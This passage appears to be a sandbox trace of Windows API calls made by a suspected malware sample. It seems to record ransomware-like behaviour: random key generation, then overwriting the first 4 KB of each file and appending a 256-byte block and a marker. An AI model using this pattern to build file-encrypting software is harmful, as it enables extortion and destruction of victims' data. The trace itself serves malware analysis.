liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.833] ReadFile (in: hFile=0x858, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.833] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.833] GetProcessHeap () returned 0x280000 [0078.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.834] GetProcessHeap () returned 0x280000 [0078.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.834] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.834] GetProcessHeap () returned 0x280000 [0078.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.834] ReadFile (in: hFile=0x858, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.003] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.003] WriteFile (in: hFile=0x858, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.003] GetProcessHeap () returned 0x280000 [0079.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.003] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.004] GetProcessHeap () returned 0x280000 [0079.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.005] GetProcessHeap () returned 0x280000 [0079.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.006] GetProcessHeap () returned 0x280000 [0079.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.006] GetProcessHeap () returned 0x280000 [0079.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0079.007] GetProcessHeap () returned 0x280000 [0079.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0079.007] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.007] WriteFile (in: hFile=0x858, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.008] WriteFile (in: hFile=0x858, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.008] GetProcessHeap () returned 0x280000 [0079.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0079.008] GetProcessHeap () returned 0x280000 [0079.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0079.008] GetProcessHeap () returned 0x280000 [0079.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0079.008] CloseHandle (hObject=0x858) returned 1 [0079.009] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 53 [0079.009] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.010] ReadFile (in: hFile=0x85c, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.010] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.010] GetProcessHeap () returned 0x280000 [0079.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0079.010] GetProcessHeap () returned 0x280000 [0079.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0079.010] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0079.010] GetProcessHeap () returned 0x280000 [0079.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0079.010] ReadFile (in: hFile=0x85c, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.068] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.068] WriteFile (in: hFile=0x85c, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.068] GetProcessHeap () returned 0x280000 [0079.068] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.069] GetProcessHeap () returned 0x280000 [0079.069] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.070] GetProcessHeap () returned 0x280000 [0079.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.071] GetProcessHeap () returned 0x280000 [0079.071] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 